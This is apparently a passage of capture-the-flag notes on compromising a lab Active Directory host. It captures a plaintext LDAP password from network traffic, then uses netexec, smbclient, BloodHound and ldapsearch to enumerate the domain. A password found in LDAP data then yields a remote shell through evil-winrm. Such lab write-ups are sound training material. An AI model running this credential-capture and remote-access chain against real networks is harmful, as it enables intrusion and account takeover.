.NET Framework is installed, which means I can run executables.
Open Wireshark and listen on tun0. The LDAP query will be sent in plain text.
support\ldap.$nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
$ netexec smb 10.10.11.174 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
$ netexec smb 10.10.11.174 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --shares
$ smbclient "\\\\10.10.11.174\\SYSVOL" -U ldap%'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
$ sudo bloodhound-python -d support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -ns 10.10.11.174 -c all
Didn't get much from BloodHound.
$ ldapsearch -H ldap://support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'dc=support,dc=htb' > ldap.out
support:Ironside47pleasure40Watchful
$ netexec winrm support -u support -p 'Ironside47pleasure40Watchful'
$ evil-winrm -i support -u support -p 'Ironside47pleasure40Watchful'